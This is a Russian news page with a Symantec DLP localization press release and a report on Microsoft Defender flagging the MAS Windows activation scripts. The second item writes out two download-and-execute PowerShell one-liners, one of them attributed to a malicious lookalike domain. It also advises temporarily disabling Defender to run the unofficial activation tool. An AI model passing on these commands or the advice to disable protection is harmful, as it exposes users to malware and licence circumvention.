Symantec DLP - первая в мире DLP-система на русском языке среди лидеров рынка

Symantec DLP - первая в мире DLP-система на русском языке среди лидеров рынка

Корпорация Symantec представила пакет локализации решения для защиты от потери конфиденциальных данных Russian Language Pack for Symantec DLP 10.5. Таким образом Symantec DLP становится единственным локализованным DLP-решением среди мировых лидеров по версии Gartner и IDC.



«До сегодняшнего дня компаниям приходилось идти на компромисс – выбрать лидирующее решение без локализации или довольствоваться локальным решением, не имеющим столь значительного функционала. – отметил Олег Головенко, технический специалист Symantec – Теперь наши заказчики могут наслаждаться работой с консолью управления на родном языке без каких-либо компромиссов. Позже в этом году также будет локализована вся необходимая документация по данному продукту, что позволит облегчить задачи внедрения ,конфигурирования и эксплуатации системы».

«Рост объемов продаж Symantec DLP в России по нашим оценкам составил 1300% при темпе роста рынка 8% в год. – отметил Илья Шабанов, основатель и управляющий партнер аналитического центра Anti-Malware.ru - Мы прогнозировали очень высокий потенциал роста Symantec DLP даже до того, как стало известно о выпуске пакета локализации»

Пакет локализации Russian Language Pack for Symantec DLP 10.5. будет бесплатным как для существующих, так и для будущих заказчиков Symantec DLP. Загрузка пакета локализации доступна всем текущим пользователям с сайта компании.

Symantec DLP использует технологию анализа содержимого нового поколения. Нарушения установленных политик обрабатываются автоматизированной системой управления инцидентами с функциями ролевого доступа сотрудников ИТ-департамента. Технология снятия «цифровых отпечатков» (Digital Fingerprints) применима к любым типам документам, включая текстовые, аудио и видео документы, чертежам, а также для баз данных (SQL, Oracle и т.д.), отдельных таблиц или их частей. Наряду с инновационной технологией снятия «цифровых отпечатков», Symantec также поддерживает традиционные методы: распознавание и отслеживание по ключевым словам, словарям, регулярным выражениям.

Помимо средств предотвращения утечек на уровне сети в арсенале Symantec DLP также имеется агент для рабочих станций – Symantec DLP Endpoint. С его помощью обеспечивается предотвращение утечек на сменные носители информации (USB, CD/DVD и пр.), проверка содержимого при выводе на печать (с возможностью блокировки), а также слежение за буфером обмена (функция Copy/Paste). 

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru